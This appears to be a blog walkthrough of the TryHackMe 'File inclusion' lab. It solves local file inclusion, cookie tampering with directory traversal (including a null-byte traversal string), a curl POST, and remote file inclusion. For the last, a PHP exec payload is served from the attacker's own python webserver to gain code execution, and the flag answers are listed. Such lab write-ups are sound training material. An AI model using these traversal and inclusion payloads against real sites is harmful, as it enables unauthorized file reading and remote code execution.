TryHackMe | File inclusion

This snapshot depicts the successful completion of the file inclusion vulnerability room.

A walkthrough to the solution for the challenge section in tryhackme | file inclusion Vulnerability. https://tryhackme.com/room/fileinc

in order to answer the questions succesfully. it is required to run the Make sure the attached VM is up and running then visit: (in my case) http://10.10.60.78/challenges/index.php

Question 1.
Capture Flag1 at /etc/flag1

Upon visiting lab1, we are presented with an input form. We could write anything to see what parameters we get.

Solution:

upon writing welcome, we see these parameters.

time to find the request method for the input form by inspecting the elements.

the form uses a GET request as highlighted in blue.

Using the curl command to further exploit the form.

ensure your version is upto date by running : sudo apt update

running the above command in terminal.

Hurrah! you found the flag

Ans: F1x3d-iNpu7-f0rrn

Question 2.

Capture Flag2 at /etc/flag2

starting lab2 we are presented with a blank page. Refresh the page

page upon refreshing, we see a welcome guest message.

We could use Burp suite to send requests as admin and manipulate the page to our liking.

Try changing ‘Guest’ to ‘Admin’ to be see admin message

You are admin now

proceed to get the flag2 , /etc/flag2 using the directory traversal method.

i.e. file=../../../../etc/flag2%00

locate the flag at the end of the page.

Hurrah! You got the flag

Ans: c00k13_i5_yuMmy1

Question 3.

Capture Flag3 at /etc/flag3

Here, we will be using curl to send a POST request to the server.

where X calls for the method POST, -d is the data, -o — is the output

Hurrah! You got the flag

Ans: P0st_1s_w0rk1in9

Question 4.

Gain RCE in Lab #Playground /playground.php with RFI to execute the hostname command. What is the output?

First thing is to understand what RCE is. Remote code execution (RCE) attacks allow an attacker to remotely execute malicious code on a computer. The impact of an RCE vulnerability can range from malware execution to an attacker gaining full control over a compromised machine.

try writing anything in the input form to see how the url behaves

Submitting the ‘hi’ in the input gives you the url below

http://10.10.48.107/playground.php?file=hi

now , in order for our RCE to work, we need to direct this website to our own server. in our case we need to make a cat.txt file whose contents contain a PHP malicious Code: <?PHP print exec(‘hostname’); ?> or <?PHP echo (‘hostname’); ?>

below is a screenshot showing how to make a .txt file from the terminal.

Host your webserver with python3.

note: You can select ip and port of your choice. In this case, my selection is 10.13.23.11 8000

connect the webserver to our attacking server as shown above.

Bingo! We got the flag

Ans: lfi-vm-thm-f8c5b1a78692